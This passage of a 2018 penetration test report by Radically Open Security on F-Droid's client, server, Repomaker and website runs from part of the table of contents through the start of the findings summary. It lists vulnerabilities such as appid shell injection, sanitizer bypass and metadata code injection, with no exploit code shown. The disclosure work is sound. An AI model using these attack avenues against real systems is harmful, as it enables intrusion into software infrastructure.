Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"><span>4.1.13</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py">OTF-013 — Image Bomb Can Lead to DoS in Fdroidserver:update.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"><span>4.1.14</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py">OTF-014 — Insecure Usage of Temporary File/Directory in Fdroidserver Docker/drozer.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver"><span>4.1.15</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver">OTF-015 — Parsing Untrusted XML Data in Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified"><span>4.1.16</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified">OTF-016 — Missing file type and size validation </a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f30-downloader-download-file-type-and-size-are-not-verified"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"><span>4.1.17</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection">OTF-017 — Use of Insecure Communication Mechanism - BluetoothClient.java</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"><span>4.1.18</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection">OTF-018 — Use of Insecure Communication Mechanism - BluetoothServer.java</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f35-potential-sql-injection"><span>4.1.19</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f35-potential-sql-injection">OTF-019 — Potential SQL Injection</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f35-potential-sql-injection"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard"><span>4.1.20</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard">OTF-020 — Unverified URI redirect</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f41-app-uses-data-from-clipboard"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f43-file-deleted-unconditionally"><span>4.1.21</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f43-file-deleted-unconditionally">OTF-021 — File Deleted Unconditionally</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f43-file-deleted-unconditionally"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended"><span>4.1.22</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended">OTF-022 — Secure Temp File Usage Recommended</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f44-secure-temp-file-usage-recommended"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>4.1.23</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues">OTF-023 — (fdroidclient) App Is Signed With `SHA1withRSA`, Known to Have Collision Issues</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions"><span>4.1.24</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions">OTF-024 — (fdroidclient) Raw SQL Query Executions</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f47--fdroidclient-raw-sql-query-executions"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"><span>4.1.25</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-">OTF-025 — (fdroid Client) Snooping in Between Clients in "Nearby Swap"</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl"><span>4.1.26</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl">OTF-026 — (fdroid Client) Insecure Implementation of SSL</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f52--fdroid-client-insecure-implementation-of-ssl"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>4.1.27</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues">OTF-027 — (Privilege Extension) Mobile application package signed with weak algorithm `SHA1withRSA`</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker"><span>4.1.28</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker">OTF-028 — Tabnabbing in Repomaker</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f1-tabnabbing-in-repomaker"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches"><span>4.1.29</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches">OTF-029 — Repomaker:apk:_def_get_type Allows for Mime Type Mismatches</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input"><span>4.1.30</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input">OTF-030 — Unsafe HTML Rendering of Arbitrary Input</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f10-unsafe-html-rendering-of-arbitrary-input"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py"><span>4.1.31</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py">OTF-031 — Dangerous Deserialization Using Python Pickle in Fdroidserver:update.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path"><span>4.1.32</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path">OTF-032 — Starting a Process With a Partial Executable Path</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f19-starting-a-process-with-a-partial-executable-path"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py"><span>4.1.33</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py">OTF-033 — Maliciously Crafted Appid Code Injection in Fdroidserver Build.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check"><span>4.1.34</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check">OTF-034 — Missing file type and size validation</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys"><span>4.1.35</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys">OTF-035 — Hardcoded root CA keys</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f36-no-mechanism-to-remove-root-ca-keys"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding"><span>4.1.36</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding">OTF-036 — Use of weak methods for data protection</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f37-use-of-rot13-and-base64-encoding"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f38-untrusted-external-links"><span>4.1.37</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f38-untrusted-external-links">OTF-037 — Untrusted External Links</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f38-untrusted-external-links"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended"><span>4.1.38</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended">OTF-038 — Weak pattern matching filter</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f42-stronger-regular-expression-recommended"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#nonFindings"><span>4.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#nonFindings">Non-Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#nonFindings"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories"><span>4.2.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories">NF-001 — (fdroid Client) Exploiting the Local Web Server of "Nearby Swap" to Navigate Directories</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts"><span>4.2.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts">NF-002 — (fdroid Client) Exploiting Exported Activities and Broadcasts</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f54--privilege-extension-static-analysis-of-apk"><span>4.2.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f54--privilege-extension-static-analysis-of-apk">NF-003 — (Privilege Extension) Static Analysis of APK</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f54--privilege-extension-static-analysis-of-apk"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#futurework"><span>5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#futurework">Future Work</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#futurework"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#conclusion"><span>6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#conclusion">Conclusion</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#conclusion"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#testteam"><span> Appendix 1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#testteam">Testing team</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#testteam"><span>•</span></a></div></td></tr>
</tbody></table></div></div></div><br><hr><div><div style="margin-right: 2cm"><table style="border-bottom-color: black; border-bottom-width: 2mm; border-bottom-style: solid; margin-left: 0cm; margin-right: 0cm;" valign="top"><tbody><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: #e2632a; text-align: center;" valign="top"><div style="color: white; font-family: Helvetica; font-size: 16pt; margin-top: 0.4cm; margin-bottom: 0.4cm;">Penetration Test Report</div></td></tr><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: white; padding-left: 0.5cm; padding-top: 0.7cm; padding-bottom: 0.4cm;" valign="top"><div style="color: black; font-family: Helvetica; font-size: 16pt; font-weight: normal;">Open Tech Fund</div></td></tr><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: white; padding-left: 0.5cm; padding-top: 0.5cm; padding-bottom: 1.2cm;" valign="top"><div><div>V 1.0</div><div>Diemen, August 29th, 2018</div><div>Confidential</div></div></td></tr></tbody></table></div></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="executiveSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Executive Summary</div></td></tr></table></div>
<a name="introduction"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.1</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Introduction</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Between February 12, 2018 and April 8, 2018, Radically Open Security B.V. carried out a code audit for Open Tech Fund
</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">This report contains our findings as well as detailed explanations of exactly
how ROS performed the code audit.</div>
</div>
<a name="scope"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.2</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Scope of work</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The scope of the penetration test was limited to the following target:</div>
<div style="margin-left: 2mm;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Client</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Privileged Extension</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Repomaker</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Server</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>•</span></div></td><td width="7.56"> </td><td valign="top"><div>F-droid Website</div></td></tr></table></div>
</div>
<a name="objectives"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.3</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Project objectives</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">The project objective was to identify vulnerabilities in Fdroid web application and mobile app. This was to be achieved by performing code audit and pen-test of Fdroid app hosting server application, the Fdroid app for browsing and downloading apps from Fdroid repositories, and code to create and register app repositories as part of Fdroid community.</div>
</div>
<a name="timeline"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.4</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Timeline</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">The Security Audit took place between Febuary 12 and April 8, 2018.</div>
</div>
<a name="resultsinanutshell"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.5</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Results In A Nutshell</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In all, we report 10 high impact, 18 moderate impact and 10 low impact issues during the course of the code audit and pen-test.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Some limited impact issues have been found in the code audit of repomaker. Some high impact code execution and infoleak issues have been found in fdroidserver which allow an adversary to run code in the host running fdroidserver and the users browsers visiting fdroid.org.
</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">
Potentially significant impact issues have been found during the Fdroid client code review, ranging from unverified trust through use of TOFU to insecure communication leading to MiTM.
</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">
During the pen-test, the request-swap functionality of the app potentially allows mailicious requests/messages to be accepted, and also redirect users to malicious sites. In addition, weaknesses in cryptography usage and potential for MiTM was discovered.
</div>
</div>
<a name="findingSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.6</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Summary of Findings</div></td></tr></table></div>
<div><table style="margin-bottom: 1.3cm; border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>ID</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Type</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Description</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Threat level</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelHigh"></a><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker" style="color: #e2632a;">OTF-001</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The user input sanitizer bleach can be circumvented and thus code
can be injected into browsers which display the descriptions of apps.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver" style="color: #e2632a;">OTF-002</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
It is possible to craft malicious APK files which contain an appid which is being used as a shell injection, allowing arbitrary code execution.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing" style="color: #e2632a;">OTF-003</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Maliciously crafted metadata can be used to run arbitrary code on the fdroidserver host.
